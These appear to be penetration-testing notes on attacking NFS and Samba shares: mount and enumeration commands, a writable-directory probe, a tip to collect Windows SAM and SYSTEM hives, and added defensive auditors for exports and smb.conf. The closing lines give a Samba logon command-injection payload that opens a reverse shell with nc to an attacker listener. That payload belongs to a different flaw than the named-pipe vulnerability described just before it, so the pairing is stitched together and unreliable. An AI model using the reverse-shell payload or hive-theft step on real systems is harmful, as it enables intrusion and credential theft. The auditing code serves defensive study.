NFS (Network File System) is a popular distributed file system. NFS shares are configured in the /etc/exports file. Remote users can mount shares and access, create and modify files. By default, created files inherit the remote user's uid and gid (as owner and group respectively), even if those ids don't exist on the NFS server.
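The uid/gid inheritance described above is what makes the export options matter: `root_squash` (the default) maps a remote uid 0 to an unprivileged account, `all_squash` maps every remote user, and a `*` host entry or an empty host field exports the path to every client. The following is an added example, not part of the original notes, that parses exports(5) syntax and flags the combinations an administrator would want to review. The sample /etc/exports content is constructed for the demo.

```python
"""Audit an /etc/exports file for options that widen remote write exposure.
Added example; the sample exports content below is constructed."""
import re

# Constructed sample /etc/exports (not taken from any real host)
SAMPLE_EXPORTS = """\
# backups for the office subnet
/srv/backup   10.10.10.0/24(rw,sync,no_root_squash)
/srv/public   *(rw,sync,insecure)
/srv/docs     10.10.10.5(ro,sync,all_squash)
/srv/scratch  (rw)
"""

# "host(opts)"; an empty host part (e.g. "(rw)" after a space) means every host
_CLIENT_RE = re.compile(r'^([^(]*)(?:\((.*)\))?$')


def parse_exports(text):
    """Return [(path, [(host, {options}), ...]), ...] from exports(5) syntax."""
    exports = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:]
        entries = []
        for client in clients:
            m = _CLIENT_RE.match(client)
            host = m.group(1) or '*'             # empty host field == world
            opts = set(o.strip() for o in m.group(2).split(',')) if m.group(2) else set()
            entries.append((host, opts))
        exports.append((path, entries))
    return exports


def audit_exports(text):
    """Flag settings that let remote users write files under their own uid/gid,
    keep root privileges, or reach the export from any host.  Defaults when no
    options are given are ro and root_squash, which produce no finding."""
    findings = []
    for path, entries in parse_exports(text):
        for host, opts in entries:
            if host == '*':
                findings.append((path, host, 'exported to every host'))
            if 'no_root_squash' in opts:
                findings.append((path, host, 'remote root keeps uid 0 on the server'))
            if 'rw' in opts and 'all_squash' not in opts:
                findings.append((path, host, 'writable; new files take the remote uid/gid'))
            if 'insecure' in opts:
                findings.append((path, host, 'accepts requests from unprivileged source ports'))
    return findings


if __name__ == '__main__':
    for path, host, msg in audit_exports(SAMPLE_EXPORTS):
        print(f'{path:<14} {host:<16} {msg}')
```

Run it against a real file with `audit_exports(open('/etc/exports').read())`; an export that needs to stay writable for untrusted clients is usually better served by `all_squash` plus `anonuid`/`anongid` pointing at a dedicated account than by the defaults.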
#Check for mountable shares
showmount -e 10.10.10.53
#List currently mounted filesystems
df -k
ls /mnt
#Mount an SMB/CIFS share (leave the password empty for a null session)
mount -t cifs -o username=notarealname,password=<Empty-for-null-login> //10.10.10.100/Sharename /mnt/local_dir_name
#Mount NFS shares (the local mount point must exist first)
sudo mkdir /tmp/tmpdir
sudo mount -t nfs 10.10.10.53:/Sharename /tmp/tmpdir
mount -t nfs [-o vers=2] <ip>:<remote_folder> /tmp/tmpdir -o nolock
#Unmount all CIFS mounts (use -t nfs for the NFS ones)
sudo umount -a -t cifs
#Script for checking which mounted directories are writable (writable.sh)
#!/bin/bash
# Walk every directory under /mnt, try to create a probe file, and remove it again
find /mnt -type d 2>/dev/null | while read -r d; do
    if touch "$d/.writable_probe" 2>/dev/null; then
        echo "$d is writable"
        rm -f "$d/.writable_probe"
    fi
done
#Mount the share
mount -t cifs -o 'rw,username=guest' //10.10.10.134/Backups localdirectory_name
#Mount the VHD file found within this share (the mount point /root/bastion must exist)
guestmount -a /mnt/remote/path/to/vhdfile.vhd -m /dev/sda1 --ro /root/bastion
Tip: Look for the SAM, SECURITY and SYSTEM registry hive files in C:\Windows\System32\config
Versions affected: All versions of Samba from 3.5.0 onwards.
Description: Malicious clients can upload a shared library to a writable share and cause the smbd server to execute it.
Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder and execute arbitrary code via a crafted named pipe.
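For a defender the actionable parts of that description are the version ranges, the "writable share reachable by a low-privilege client" precondition, and the named-pipe path, which Samba lets you switch off with the global smb.conf setting `nt pipe support = no` (a real parameter documented in smb.conf(5); its use as the published workaround for this issue is stated here from my own knowledge, not from the notes above). The following is an added example, not code from the original page, that applies the quoted version ranges, parses an smb.conf, and reports writable guest-accessible shares and whether the workaround is set. The sample smb.conf is constructed.

```python
"""Check a Samba version against the affected ranges quoted in the notes and
inspect smb.conf for the named-pipe workaround and risky share definitions.
Added example; the sample smb.conf below is constructed."""
import re

# Constructed smb.conf for the demo (not from any real server)
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = file server
   nt pipe support = no

[tmp]
   path = /tmp
   writable = yes
   guest ok = yes

[docs]
   path = /srv/docs
   read only = yes
"""


def parse_version(s):
    """'4.5.9' or 'Version 4.5.9-Ubuntu' -> (4, 5, 9)."""
    m = re.search(r'(\d+)\.(\d+)\.(\d+)', s)
    if not m:
        raise ValueError(f'no x.y.z version in {s!r}')
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """Ranges as quoted above: 3.x from 3.5.0 onward; 4.x before 4.4.14;
    4.5.x before 4.5.10; 4.6.x before 4.6.4.  Anything newer is fixed."""
    major, minor, _ = version
    if major == 3:
        return version >= (3, 5, 0)
    if major == 4:
        if minor <= 4:
            return version < (4, 4, 14)
        if minor == 5:
            return version < (4, 5, 10)
        if minor == 6:
            return version < (4, 6, 4)
    return False


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section name: {normalised key: value}}.
    Samba ignores case and internal whitespace in parameter names."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in '#;':
            continue
        if line.startswith('[') and line.endswith(']'):
            section = line[1:-1].strip().lower()
            conf[section] = {}
            continue
        if '=' in line and section is not None:
            key, _, value = line.partition('=')
            conf[section][' '.join(key.lower().split())] = value.strip()
    return conf


def _yes(value):
    return value.strip().lower() in ('yes', 'true', '1')


def pipe_workaround_present(text):
    """True when [global] disables NT named pipes (default is yes/enabled)."""
    glob = parse_smb_conf(text).get('global', {})
    return glob.get('nt pipe support', 'yes').strip().lower() in ('no', 'false', '0')


def writable_guest_shares(text):
    """Shares that are both writable and guest-accessible: the precondition
    the description above relies on.  Samba defaults: read only = yes,
    guest ok = no; 'writable'/'writeable' are the inverse of 'read only'."""
    out = []
    for name, kv in parse_smb_conf(text).items():
        if name == 'global':
            continue
        writable = _yes(kv.get('writable', kv.get('writeable', 'no'))) or (
            'read only' in kv and not _yes(kv['read only']))
        guest = _yes(kv.get('guest ok', kv.get('public', 'no')))
        if writable and guest:
            out.append(name)
    return out


if __name__ == '__main__':
    print('affected 4.5.9:', is_affected(parse_version('Version 4.5.9-Ubuntu')))
    print('workaround set:', pipe_workaround_present(SAMPLE_SMB_CONF))
    print('writable guest shares:', writable_guest_shares(SAMPLE_SMB_CONF))
```

On a live host, feed `parse_version` the output of `smbd -V` and `parse_smb_conf` the output of `testparm -s`, which prints the effective configuration with includes resolved; patching to a fixed version is the real fix, and the workaround only covers the gap until then.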
#From the attacker's system (the nc call below connects back to a listener waiting on 192.168.119.174:4444)
smbclient //victim_IP/tmp --option='client min protocol=NT1'
logon "/=`nohup nc -nv 192.168.119.174 4444 -e /bin/sh`"